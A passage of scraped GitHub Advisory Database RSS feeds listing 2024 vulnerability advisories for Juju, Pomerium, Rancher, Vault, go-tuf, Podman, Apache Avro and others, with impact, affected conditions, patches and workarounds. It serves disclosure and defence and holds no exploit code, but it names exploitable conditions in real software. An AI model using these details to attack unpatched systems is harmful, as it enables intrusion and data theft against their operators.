<li><a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/juju/juju/commit/ecd7e2d0e9867576b9da04871e22232f06fa0cc7/hovercard" href="https://github.com/juju/juju/commit/ecd7e2d0e9867576b9da04871e22232f06fa0cc7">juju/juju@<tt>ecd7e2d</tt></a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-mh98-763h-m9v4</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-mh98-763h-m9v4</guid>
<pubDate>Thu, 03 Oct 2024 16:49:58 GMT</pubDate>
</item>
<item>
<title>Pomerium service account access token may grant unintended access to databroker API</title>
<description><h3>Impact</h3>
<p>We've identified a vulnerability in the Pomerium databroker service API that may grant unintended access under specific conditions. This affects only certain Pomerium Zero and Pomerium Enterprise deployments.</p>
<h4>Who is affected?</h4>
<p>A Pomerium deployment is susceptible to this issue if <em>all</em> of the following conditions are met:</p>
<ul>
<li>You have issued a <a href="https://www.pomerium.com/docs/capabilities/service-accounts" rel="nofollow">service account</a> access token using Pomerium Zero or Pomerium Enterprise.</li>
<li>The access token has an explicit expiration date in the future.</li>
<li>The core Pomerium databroker gRPC API is not otherwise secured by network access controls.</li>
</ul>
<p>If your deployment does not meet <em>all</em> of these conditions, you are not affected by this vulnerability.</p>
<h4>Details</h4>
<p>The Pomerium databroker service is responsible for managing all persistent Pomerium application state. Requests to the databroker service API are authorized by the presence of a JSON Web Token (JWT) signed by a key known by all Pomerium services in the same deployment. However, incomplete validation of this JWT meant that some service account access tokens would incorrectly be treated as valid for the purpose of databroker API authorization.</p>
<p>Improper access to the databroker API could allow exfiltration of user info, spoofing of user sessions, or tampering with Pomerium routes, policies, and other settings.</p>
<h4>Discovery</h4>
<p>This issue was discovered during internal review. At this time we have no evidence to suggest that this vulnerability has been exploited in the wild.</p>
<h3>Patches</h3>
<p>We have released <a href="https://github.com/pomerium/pomerium/releases/tag/v0.27.1">Pomerium v0.27.1</a> which includes a fix for the JWT validation logic. All affected users are strongly encouraged to upgrade to this version.</p>
<h3>Workarounds</h3>
<p>If you cannot upgrade immediately, consider the following mitigations:</p>
<ul>
<li>
<p>Network access controls: Restrict access to the Pomerium internal gRPC API by configuring your network firewall or security groups to limit access to trusted sources only. Ensure that the port specified in the <a href="https://www.pomerium.com/docs/reference/grpc#grpc-address" rel="nofollow"><code class="notranslate">grpc_address</code></a> setting is not exposed to unauthorized networks.</p>
</li>
<li>
<p><em>For Pomerium Zero deployments only:</em> As of Pomerium v0.26.0, you can disable the gRPC API listener by setting <code class="notranslate">grpc_address: ""</code> in your YAML configuration file. In all-in-one mode, Pomerium does not require the internal gRPC API to be exposed beyond localhost.</p>
</li>
</ul>
<h3>For more information</h3>
<p>If you have questions or need further assistance:</p>
<ul>
<li>Open an issue in the <a href="https://github.com/pomerium/pomerium/issues">pomerium/pomerium</a> repository.</li>
<li>Contact us at <a href="mailto:security@pomerium.com">security@pomerium.com</a>.</li>
</ul>
<h3>References</h3>
<ul>
<li><a title="GHSA-r7rh-jww5-5fjr" href="https://github.com/pomerium/pomerium/security/advisories/GHSA-r7rh-jww5-5fjr">GHSA-r7rh-jww5-5fjr</a></li>
<li><a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/pomerium/pomerium/commit/e018cf0fc0979d2abe25ff705db019feb7523444/hovercard" href="https://github.com/pomerium/pomerium/commit/e018cf0fc0979d2abe25ff705db019feb7523444">pomerium/pomerium@<tt>e018cf0</tt></a></li>
<li><a href="https://github.com/pomerium/pomerium/releases/tag/v0.27.1">https://github.com/pomerium/pomerium/releases/tag/v0.27.1</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-47616" rel="nofollow">https://nvd.nist.gov/vuln/detail/CVE-2024-47616</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-r7rh-jww5-5fjr</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-r7rh-jww5-5fjr</guid>
<pubDate>Wed, 02 Oct 2024 21:33:11 GMT</pubDate>
</item>
<item>
<title>Duplicate Advisory: Juju makes Use of Weak Credentials</title>
<description><h2>Duplicate Advisory</h2>
<p>This advisory has been withdrawn because it is a duplicate of <a title="GHSA-mh98-763h-m9v4" data-hovercard-type="advisory" data-hovercard-url="/advisories/GHSA-mh98-763h-m9v4/hovercard" href="https://github.com/advisories/GHSA-mh98-763h-m9v4">GHSA-mh98-763h-m9v4</a>. This link is maintained to preserve external references.</p>
<h2>Original Description</h2>
<p>JUJU_CONTEXT_ID is a predictable authentication secret. On a Juju machine (non-Kubernetes) or Juju charm container (on Kubernetes), an unprivileged user in the same network namespace can connect to an abstract domain socket and guess the JUJU_CONTEXT_ID value. This gives the unprivileged user access to the same information and tools as the Juju charm.</p>
<h3>References</h3>
<ul>
<li><a title="GHSA-mh98-763h-m9v4" href="https://github.com/juju/juju/security/advisories/GHSA-mh98-763h-m9v4">GHSA-mh98-763h-m9v4</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-7558" rel="nofollow">https://nvd.nist.gov/vuln/detail/CVE-2024-7558</a></li>
<li><a href="https://www.cve.org/CVERecord?id=CVE-2024-7558" rel="nofollow">https://www.cve.org/CVERecord?id=CVE-2024-7558</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-phh4-3hmm-24rx</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-phh4-3hmm-24rx</guid>
<pubDate>Wed, 02 Oct 2024 12:30:33 GMT</pubDate>
</item>
<item>
<title>Duplicate Advisory: Vulnerable juju hook tool abstract UNIX domain socket</title>
<description><h2>Duplicate Advisory</h2>
<p>This advisory has been withdrawn because it is a duplicate of <a title="GHSA-8v4w-f4r9-7h6x" data-hovercard-type="advisory" data-hovercard-url="/advisories/GHSA-8v4w-f4r9-7h6x/hovercard" href="https://github.com/advisories/GHSA-8v4w-f4r9-7h6x">GHSA-8v4w-f4r9-7h6x</a>. This link is maintained to preserve external references.</p>
<h2>Original Description</h2>
<p>Vulnerable juju hook tool abstract UNIX domain socket. When combined with an attack of JUJU_CONTEXT_ID, any user on the local system with access to the default network namespace may connect to the @/var/lib/juju/agents/unit-xxxx-yyyy/agent.socket and perform actions that are normally reserved to a juju charm.</p>
<h3>References</h3>
<ul>
<li><a title="GHSA-8v4w-f4r9-7h6x" href="https://github.com/juju/juju/security/advisories/GHSA-8v4w-f4r9-7h6x">GHSA-8v4w-f4r9-7h6x</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-8037" rel="nofollow">https://nvd.nist.gov/vuln/detail/CVE-2024-8037</a></li>
<li><a href="https://www.cve.org/CVERecord?id=CVE-2024-8037" rel="nofollow">https://www.cve.org/CVERecord?id=CVE-2024-8037</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-fc27-7pf5-96v3</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-fc27-7pf5-96v3</guid>
<pubDate>Wed, 02 Oct 2024 12:30:33 GMT</pubDate>
</item>
<item>
<title>Duplicate Advisory: Juju Unprotected Alternate Channel vulnerability</title>
<description><h2>Duplicate Advisory</h2>
<p>This advisory has been withdrawn because it is a duplicate of <a title="GHSA-xwgj-vpm9-q2rq" data-hovercard-type="advisory" data-hovercard-url="/advisories/GHSA-xwgj-vpm9-q2rq/hovercard" href="https://github.com/advisories/GHSA-xwgj-vpm9-q2rq">GHSA-xwgj-vpm9-q2rq</a>. This link is maintained to preserve external references.</p>
<h2>Original Description</h2>
<p>Vulnerable juju introspection abstract UNIX domain socket. An abstract UNIX domain socket responsible for introspection is available without authentication locally to network namespace users. This enables denial of service attacks.</p>
<h3>References</h3>
<ul>
<li><a title="GHSA-xwgj-vpm9-q2rq" href="https://github.com/juju/juju/security/advisories/GHSA-xwgj-vpm9-q2rq">GHSA-xwgj-vpm9-q2rq</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-8038" rel="nofollow">https://nvd.nist.gov/vuln/detail/CVE-2024-8038</a></li>
<li><a href="https://www.cve.org/CVERecord?id=CVE-2024-8038" rel="nofollow">https://www.cve.org/CVERecord?id=CVE-2024-8038</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-85qf-6845-m8p2</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-85qf-6845-m8p2</guid>
<pubDate>Wed, 02 Oct 2024 12:30:33 GMT</pubDate>
</item>
<item>
<title>Portainer improperly uses an encryption algorithm in the AesEncrypt function</title>
<description><p>Portainer before 2.20.2 improperly uses an encryption algorithm in the <code class="notranslate">AesEncrypt</code> function.</p>
<h3>References</h3>
<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-33662" rel="nofollow">https://nvd.nist.gov/vuln/detail/CVE-2024-33662</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2271053598" data-permission-text="Title is private" data-url="https://github.com/portainer/portainer/issues/11737" data-hovercard-type="issue" data-hovercard-url="/portainer/portainer/issues/11737/hovercard" href="https://github.com/portainer/portainer/issues/11737">portainer/portainer#11737</a></li>
<li><a class="commit-link" href="https://github.com/portainer/portainer/compare/2.20.1...2.20.2">portainer/portainer@<tt>2.20.1...2.20.2</tt></a></li>
<li><a href="https://www.portainer.io/" rel="nofollow">https://www.portainer.io</a></li>
<li><a href="https://github.com/search?q=repo%3Aportainer%2Fportainer+EE-6764&amp;type=pullrequests">https://github.com/search?q=repo%3Aportainer%2Fportainer+EE-6764&amp;type=pullrequests</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-9mjw-79r6-c9m8</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-9mjw-79r6-c9m8</guid>
<pubDate>Wed, 02 Oct 2024 06:30:26 GMT</pubDate>
</item>
<item>
<title>Improper Input Validation in Buildah and Podman</title>
<description><p>A vulnerability exists in the bind-propagation option of the Dockerfile RUN --mount instruction. The system does not properly validate the input passed to this option, allowing users to pass arbitrary parameters to the mount instruction. This issue can be exploited to mount sensitive directories from the host into a container during the build process and, in some cases, modify the contents of those mounted files. Even if SELinux is used, this vulnerability can bypass its protection by allowing the source directory to be relabeled to give the container access to host files.</p>
<h3>References</h3>
<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-9407" rel="nofollow">https://nvd.nist.gov/vuln/detail/CVE-2024-9407</a></li>
<li><a href="https://access.redhat.com/security/cve/CVE-2024-9407" rel="nofollow">https://access.redhat.com/security/cve/CVE-2024-9407</a></li>
<li><a href="https://bugzilla.redhat.com/show_bug.cgi?id=2315887" rel="nofollow">https://bugzilla.redhat.com/show_bug.cgi?id=2315887</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-fhqq-8f65-5xfc</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-fhqq-8f65-5xfc</guid>
<pubDate>Tue, 01 Oct 2024 21:31:35 GMT</pubDate>
</item>
<item>
<title>Link Following in github.com/containers/common</title>
<description><p>A flaw was found in Go. When FIPS mode is enabled on a system, container runtimes may incorrectly handle certain file paths due to improper validation in the containers/common Go library. This flaw allows an attacker to exploit symbolic links and trick the system into mounting sensitive host directories inside a container. This issue also allows attackers to access critical host files, bypassing the intended isolation between containers and the host system.</p>
<h3>References</h3>
<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-9341" rel="nofollow">https://nvd.nist.gov/vuln/detail/CVE-2024-9341</a></li>
<li><a href="https://access.redhat.com/security/cve/CVE-2024-9341" rel="nofollow">https://access.redhat.com/security/cve/CVE-2024-9341</a></li>
<li><a href="https://bugzilla.redhat.com/show_bug.cgi?id=2315691" rel="nofollow">https://bugzilla.redhat.com/show_bug.cgi?id=2315691</a></li>
<li><a href="https://github.com/containers/common/blob/384f77532f67afc8a73d8e0c4adb0d195df57714/pkg/subscriptions/subscriptions.go#L169">https://github.com/containers/common/blob/384f77532f67afc8a73d8e0c4adb0d195df57714/pkg/subscriptions/subscriptions.go#L169</a></li>
<li><a href="https://github.com/containers/common/blob/384f77532f67afc8a73d8e0c4adb0d195df57714/pkg/subscriptions/subscriptions.go#L349">https://github.com/containers/common/blob/384f77532f67afc8a73d8e0c4adb0d195df57714/pkg/subscriptions/subscriptions.go#L349</a></li>
<li><a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/containers/common/commit/e7db06585c32e1a782c1d9aa3b71ccd708f5e23f/hovercard" href="https://github.com/containers/common/commit/e7db06585c32e1a782c1d9aa3b71ccd708f5e23f">containers/common@<tt>e7db065</tt></a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-mc76-5925-c5p6</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-mc76-5925-c5p6</guid>
<pubDate>Tue, 01 Oct 2024 21:31:34 GMT</pubDate>
</item>
<item>
<title>Golang FIPS OpenSSL has a Use of Uninitialized Variable vulnerability</title>
<description><p>A vulnerability was found in Golang FIPS OpenSSL. This flaw allows a malicious user to randomly cause an uninitialized buffer length variable with a zeroed buffer to be returned in FIPS mode. It may also be possible to force a false positive match between non-equal hashes when comparing a trusted computed hmac sum to an untrusted input sum if an attacker can send a zeroed buffer in place of a pre-computed sum.&nbsp; It is also possible to force a derived key to be all zeros instead of an unpredictable value.&nbsp; This may have follow-on implications for the Go TLS stack.</p>
<h3>References</h3>
<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-9355" rel="nofollow">https://nvd.nist.gov/vuln/detail/CVE-2024-9355</a></li>
<li><a href="https://access.redhat.com/security/cve/CVE-2024-9355" rel="nofollow">https://access.redhat.com/security/cve/CVE-2024-9355</a></li>
<li><a href="https://bugzilla.redhat.com/show_bug.cgi?id=2315719" rel="nofollow">https://bugzilla.redhat.com/show_bug.cgi?id=2315719</a></li>
<li><a href="https://access.redhat.com/errata/RHSA-2024:7502" rel="nofollow">https://access.redhat.com/errata/RHSA-2024:7502</a></li>
<li><a href="https://access.redhat.com/errata/RHSA-2024:7550" rel="nofollow">https://access.redhat.com/errata/RHSA-2024:7550</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-3h3x-2hwv-hr52</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-3h3x-2hwv-hr52</guid>
<pubDate>Tue, 01 Oct 2024 21:31:34 GMT</pubDate>
</item>
<item>
<title>Incorrect delegation lookups can make go-tuf download the wrong artifact</title>
<description><p>During the ongoing work on the TUF conformance test suite, we have come across a test that reveals what we believe is a bug in go-tuf with security implications. The bug exists in go-tuf delegation tracing and could result in downloading the wrong artifact.</p>
<p>We have come across this issue in the test in this PR: <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2451719515" data-permission-text="Title is private" data-url="https://github.com/theupdateframework/tuf-conformance/issues/115" data-hovercard-type="pull_request" data-hovercard-url="/theupdateframework/tuf-conformance/pull/115/hovercard" href="https://github.com/theupdateframework/tuf-conformance/pull/115">theupdateframework/tuf-conformance#115</a>.</p>
<p>The test - <code class="notranslate">test_graph_traversal</code> - sets up a repository with a series of delegations, invokes the clients <code class="notranslate">refresh()</code> and then checks the order in which the client traced the delegations. The test shows that the go-tuf client inconsistently traces the delegations in a wrong way. For example, <a href="https://github.com/theupdateframework/tuf-conformance/pull/115#issuecomment-2275625542" data-hovercard-type="pull_request" data-hovercard-url="/theupdateframework/tuf-conformance/pull/115/hovercard">during one CI run</a>, the <code class="notranslate">two-level-delegations</code> test case triggered a wrong order. The delegations in this look as such:</p>
<div class="highlight highlight-source-python"><pre class="notranslate"><span class="pl-s">"two-level-delegations"</span>: <span class="pl-v">DelegationsTestCase</span>(
<span class="pl-s1">delegations</span><span class="pl-c1">=</span>[
<span class="pl-v">DelegationTester</span>(<span class="pl-s">"targets"</span>, <span class="pl-s">"A"</span>),
<span class="pl-v">DelegationTester</span>(<span class="pl-s">"targets"</span>, <span class="pl-s">"B"</span>),
<span class="pl-v">DelegationTester</span>(<span class="pl-s">"B"</span>, <span class="pl-s">"C"</span>),
],
<span class="pl-s1">visited_order</span><span class="pl-c1">=</span>[<span class="pl-s">"A"</span>, <span class="pl-s">"B"</span>, <span class="pl-s">"C"</span>],
),</pre></div>
<p>Here, <code class="notranslate">targets</code> delegate to <code class="notranslate">"A"</code>, and to <code class="notranslate">"B"</code>, and <code class="notranslate">"B"</code> delegates to <code class="notranslate">"C"</code>. The client should trace the delegations in the order <code class="notranslate">"A"</code> then <code class="notranslate">"B"</code> then <code class="notranslate">"C"</code> but in this particular CI run, go-tuf traced the delegations <code class="notranslate">"B"-&gt;"C"-&gt;"A"</code>.</p>
<p>In a subsequent CI run, this test case did not fail, but <a href="https://github.com/theupdateframework/tuf-conformance/pull/115#issuecomment-2275640487" data-hovercard-type="pull_request" data-hovercard-url="/theupdateframework/tuf-conformance/pull/115/hovercard">another one did</a>.</p>
<p><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jku/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jku">@jku</a> has done a bit of debugging and believes that the returned map of <code class="notranslate">GetRolesForTarget</code> returns a map that causes this behavior:</p>
<p><a href="https://github.com/theupdateframework/go-tuf/blob/f95222bdd22d2ac4e5b8ed6fe912b645e213c3b5/metadata/metadata.go#L565-L580">https://github.com/theupdateframework/go-tuf/blob/f95222bdd22d2ac4e5b8ed6fe912b645e213c3b5/metadata/metadata.go#L565-L580</a></p>
<p>We believe that this map should be an ordered list instead of a map.</p>
<h3>References</h3>
<ul>
<li><a title="GHSA-4f8r-qqr9-fq8j" href="https://github.com/theupdateframework/go-tuf/security/advisories/GHSA-4f8r-qqr9-fq8j">GHSA-4f8r-qqr9-fq8j</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2451719515" data-permission-text="Title is private" data-url="https://github.com/theupdateframework/tuf-conformance/issues/115" data-hovercard-type="pull_request" data-hovercard-url="/theupdateframework/tuf-conformance/pull/115/hovercard" href="https://github.com/theupdateframework/tuf-conformance/pull/115">theupdateframework/tuf-conformance#115</a></li>
<li><a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/theupdateframework/go-tuf/commit/f36420caba9edbfdfd64f95a9554c0836d9cf819/hovercard" href="https://github.com/theupdateframework/go-tuf/commit/f36420caba9edbfdfd64f95a9554c0836d9cf819">theupdateframework/go-tuf@<tt>f36420c</tt></a></li>
<li><a href="https://github.com/theupdateframework/go-tuf/blob/f95222bdd22d2ac4e5b8ed6fe912b645e213c3b5/metadata/metadata.go#L565-L580">https://github.com/theupdateframework/go-tuf/blob/f95222bdd22d2ac4e5b8ed6fe912b645e213c3b5/metadata/metadata.go#L565-L580</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-47534" rel="nofollow">https://nvd.nist.gov/vuln/detail/CVE-2024-47534</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-4f8r-qqr9-fq8j</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-4f8r-qqr9-fq8j</guid>
<pubDate>Tue, 01 Oct 2024 18:13:25 GMT</pubDate>
</item>
<item>
<title>Vault SSH Secrets Engine Configuration Did Not Restrict Valid Principals By Default</title>
<description><p>Vault’s SSH secrets engine did not require the valid_principals list to contain a value by default. If the valid_principals and default_user fields of the SSH secrets engine configuration are not set, an SSH certificate requested by an authorized user to Vault’s SSH secrets engine could be used to authenticate as any user on the host. Fixed in Vault Community Edition 1.17.6, and in Vault Enterprise 1.17.6, 1.16.10, and 1.15.15.</p>
<h3>References</h3>
<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-7594" rel="nofollow">https://nvd.nist.gov/vuln/detail/CVE-2024-7594</a></li>
<li><a href="https://discuss.hashicorp.com/t/hcsec-2024-20-vault-ssh-secrets-engine-configuration-did-not-restrict-valid-principals-by-default/70251" rel="nofollow">https://discuss.hashicorp.com/t/hcsec-2024-20-vault-ssh-secrets-engine-configuration-did-not-restrict-valid-principals-by-default/70251</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-jg74-mwgw-v6x3</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-jg74-mwgw-v6x3</guid>
<pubDate>Thu, 26 Sep 2024 21:31:11 GMT</pubDate>
</item>
<item>
<title>Rancher agents can be hijacked by taking over the Rancher Server URL</title>
<description><h3>Impact</h3>
<p>A vulnerability has been identified within Rancher that can be exploited in narrow circumstances through a man-in-the-middle (MITM) attack. An attacker would need to have control of an expired domain or execute a DNS spoofing/hijacking attack against the domain to exploit this vulnerability. The targeted domain is the one used as the Rancher URL.</p>
<p>SUSE is unaware of any successful exploitation of this vulnerability, which has a high complexity bar.</p>
<p>Please consult the associated <a href="https://attack.mitre.org/techniques/T1557/" rel="nofollow">MITRE ATT&amp;CK - Technique - Adversary-in-the-Middle</a> for further information about this attack category.</p>
<h3>Patches</h3>
<p>A new setting, <a href="https://ranchermanager.docs.rancher.com/getting-started/installation-and-upgrade/installation-references/tls-settings" rel="nofollow"><code class="notranslate">agent-tls-mode</code></a>, was added, which allows users to specify if agents will use <code class="notranslate">strict</code> certificate verification when connecting to Rancher. The field can be set to <code class="notranslate">strict</code> (which requires the agent to verify the certificate using only the Certificate Authority in the <code class="notranslate">cacerts</code> setting) or <code class="notranslate">system-store</code> (which allows the agent to verify the certificate using any Certificate Authority in the operating system's trust store). This setting will default to strict on new installs of Rancher <code class="notranslate">v2.8.6</code>, <code class="notranslate">v2.9.0</code>, and newer versions. When upgrading from a prior version, the current value will be kept. If updating from older versions, the settings must be manually configured.</p>
<p><strong>Important:</strong> For non-Windows nodes, this is fixed since <code class="notranslate">v2.8.6</code> and <code class="notranslate">v2.9.0</code>. For Windows nodes, this is fully fixed starting with <code class="notranslate">v2.8.8</code> and <code class="notranslate">v2.9.2</code></p>
<p>Patched versions include releases <code class="notranslate">v2.8.8</code> and <code class="notranslate">v2.9.2</code>.</p>
<p>For non-Windows nodes, the fix was released with <code class="notranslate">v2.7.15</code>. However, if you are running Rancher <code class="notranslate">v2.7.x</code> and have Windows nodes, you must follow the below workaround to address this issue on those nodes.</p>
<h3>Workarounds</h3>
<p>If you can't update, please follow the standard security practices including:</p>
<ol>
<li>Properly control the expiration and ownership of the domain used as the Rancher URL (the <code class="notranslate">server-url</code> of the Rancher cluster).</li>
<li>Enabling DNSSEC as a way to protect against DNS spoofing or hijacking attacks.</li>
<li>Properly clean up and decommission unused clusters and downstream clusters, instead of leaving them behind. For example, downstream clusters which are alive while the main Rancher server is no longer available.</li>
</ol>
<p>In some cases, Windows nodes added to RKE2 clusters may not be automatically updated with the desired <code class="notranslate">agent-tls-mode</code>. Windows clusters running at least the August patches (<code class="notranslate">v1.27.16</code>, <code class="notranslate">v1.28.13</code>, <code class="notranslate">v1.29.8</code>, <code class="notranslate">v1.30.4</code>) will be automatically updated. For Windows nodes running older versions of RKE2, this issue can be manually resolved by following these <a href="https://github.com/rancherlabs/support-tools/tree/master/windows-agent-strict-verify">instructions</a>.</p>
<p>If you are running Rancher <code class="notranslate">v2.7.x</code> Windows nodes will not automatically update, and you must follow the above <a href="https://github.com/rancherlabs/support-tools/tree/master/windows-agent-strict-verify">instructions</a>, with the following notes:</p>
<ol>
<li>This needs to be done for all existing Windows nodes and any new nodes provisioned.</li>
<li>You must omit the <code class="notranslate">DownloadWins</code> flag, and must instead manually download the <code class="notranslate">rancher-wins</code> version <a href="https://github.com/rancher/wins/releases/tag/v0.4.18">0.4.18</a>, or greater, from its GitHub repository and place it in the required directories:<br>
a. <code class="notranslate">c:\Windows</code><br>
b. <code class="notranslate">c:\user\local\bin</code></li>
<li>You must restart the nodes after running the script, simply restarting <code class="notranslate">rancher-wins</code> or RKE2 will result in <a href="https://github.com/rancher/rke2/issues/5551" data-hovercard-type="issue" data-hovercard-url="/rancher/rke2/issues/5551/hovercard">pod networking errors</a>. The only scenario where you do not need to completely restart the node is if the cluster is running version <code class="notranslate">v1.27.16</code> or higher.</li>
</ol>
<h3>Credits</h3>
<p>This issue was found and reported by Jarkko Vesiluoma from Redtest Security.</p>
<h3>For more information</h3>
<p>If you have any questions or comments about this advisory:</p>
<ul>
<li>Reach out to the <a href="https://github.com/rancher/rancher/security/policy">SUSE Rancher Security team</a> for security related inquiries.</li>
<li>Open an issue in the <a href="https://github.com/rancher/rancher/issues/new/choose">Rancher</a> repository.</li>
<li>Verify with our <a href="https://www.suse.com/suse-rancher/support-matrix/all-supported-versions/" rel="nofollow">support matrix</a> and <a href="https://www.suse.com/lifecycle/" rel="nofollow">product support lifecycle</a>.</li>
</ul>
<h3>References</h3>
<ul>
<li><a title="GHSA-h4h5-9833-v2p4" href="https://github.com/rancher/rancher/security/advisories/GHSA-h4h5-9833-v2p4">GHSA-h4h5-9833-v2p4</a></li>
<li><a href="https://github.com/rancherlabs/support-tools/tree/master/windows-agent-strict-verify">https://github.com/rancherlabs/support-tools/tree/master/windows-agent-strict-verify</a></li>
<li><a href="https://ranchermanager.docs.rancher.com/getting-started/installation-and-upgrade/installation-references/tls-settings" rel="nofollow">https://ranchermanager.docs.rancher.com/getting-started/installation-and-upgrade/installation-references/tls-settings</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-h4h5-9833-v2p4</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-h4h5-9833-v2p4</guid>
<pubDate>Thu, 26 Sep 2024 21:13:08 GMT</pubDate>
</item>
<item>
<title>Ory Kratos's setting required_aal `highest_available` does not properly respect code + mfa credentials</title>
<description><h2>Preconditions</h2>
<ul>
<li>The <code class="notranslate">code</code> login method is enabled with the <code class="notranslate">passwordless_enabled</code> flag set to <code class="notranslate">true</code> .</li>
<li>A 2FA method such as <code class="notranslate">totp</code> is enabled.</li>
<li><code class="notranslate">required_aal</code> of the whomai check or the settings flow is set to <code class="notranslate">highest_available</code>. AAL stands for Authenticator Assurance Levels and can range from 0 (no factor) to 2 (two factors).</li>
<li>A user uses the <code class="notranslate">code</code> method as the <strong>only</strong> login method available. They do not have a password or any other first factor credential enabled.</li>
<li>The user has 2FA enabled.</li>
<li>The user’s <code class="notranslate">available_aal</code> is incorrectly stored in the database as <code class="notranslate">aal1</code> or <code class="notranslate">aal0</code> or <code class="notranslate">NULL</code>.</li>
<li>A user signs in using the code method, but does not complete the 2FA challenge.</li>
</ul>
<p><strong>Example server configuration</strong></p>
<p>Below you will find an vulnerable example configuration. Keep in mind that, for the account to be vulnerable, the account must have no first factor except the <code class="notranslate">code</code> method enabled plus a second factor.</p>
<pre class="notranslate"><code class="notranslate">selfservice:
methods:
code:
#... |
http://localhost:1200/github/advisor/data/reviewed/maven - Success ✔️<?xml version="1.0" encoding="UTF-8"?>
<rss xmlns:atom="http://www.w3.org/2005/Atom" version="2.0">
<channel>
<title>GitHub Advisory Database RSS - maven - reviewed</title>
<link>https://github.com/advisories</link>
<atom:link href="http://localhost:1200/github/advisor/data/reviewed/maven" rel="self" type="application/rss+xml"></atom:link>
<description>GitHub Advisory Database RSS - maven - reviewed - Powered by RSSHub</description>
<generator>RSSHub</generator>
<webMaster>contact@rsshub.app (RSSHub)</webMaster>
<language>en</language>
<lastBuildDate>Sat, 05 Oct 2024 18:31:06 GMT</lastBuildDate>
<ttl>5</ttl>
<item>
<title>JSON-lib mishandles an unbalanced comment string</title>
<description><p>util/JSONTokener.java in JSON-lib before 3.1.0 mishandles an unbalanced comment string.</p>
<h3>References</h3>
<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-47855" rel="nofollow">https://nvd.nist.gov/vuln/detail/CVE-2024-47855</a></li>
<li><a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/kordamp/json-lib/commit/a0c4a0eae277130e22979cf307c95dec4005a78e/hovercard" href="https://github.com/kordamp/json-lib/commit/a0c4a0eae277130e22979cf307c95dec4005a78e">kordamp/json-lib@<tt>a0c4a0e</tt></a></li>
<li><a class="commit-link" href="https://github.com/kordamp/json-lib/compare/v3.0.3...v3.1.0">kordamp/json-lib@<tt>v3.0.3...v3.1.0</tt></a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-wwcp-26wc-3fxm</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-wwcp-26wc-3fxm</guid>
<pubDate>Fri, 04 Oct 2024 06:30:45 GMT</pubDate>
</item>
<item>
<title>Apache Commons IO: Possible denial of service attack on untrusted input to XmlStreamReader</title>
<description><p>Uncontrolled Resource Consumption vulnerability in Apache Commons IO.</p>
<p>The <code class="notranslate">org.apache.commons.io.input.XmlStreamReader</code> class may excessively consume CPU resources when processing maliciously crafted input.</p>
<p>This issue affects Apache Commons IO: from 2.0 before 2.14.0.</p>
<p>Users are recommended to upgrade to version 2.14.0 or later, which fixes the issue.</p>
<h3>References</h3>
<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-47554" rel="nofollow">https://nvd.nist.gov/vuln/detail/CVE-2024-47554</a></li>
<li><a href="https://lists.apache.org/thread/6ozr91rr9cj5lm0zyhv30bsp317hk5z1" rel="nofollow">https://lists.apache.org/thread/6ozr91rr9cj5lm0zyhv30bsp317hk5z1</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-78wr-2p64-hpwj</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-78wr-2p64-hpwj</guid>
<pubDate>Thu, 03 Oct 2024 12:30:48 GMT</pubDate>
</item>
<item>
<title>Apache Avro Java SDK: Arbitrary Code Execution when reading Avro Data (Java SDK)</title>
<description><p>Schema parsing in the Java SDK of Apache Avro 1.11.3 and previous versions allows bad actors to execute arbitrary code.<br>
Users are recommended to upgrade to version 1.11.4&nbsp; or 1.12.0, which fix this issue.</p>
<h3>References</h3>
<ul>
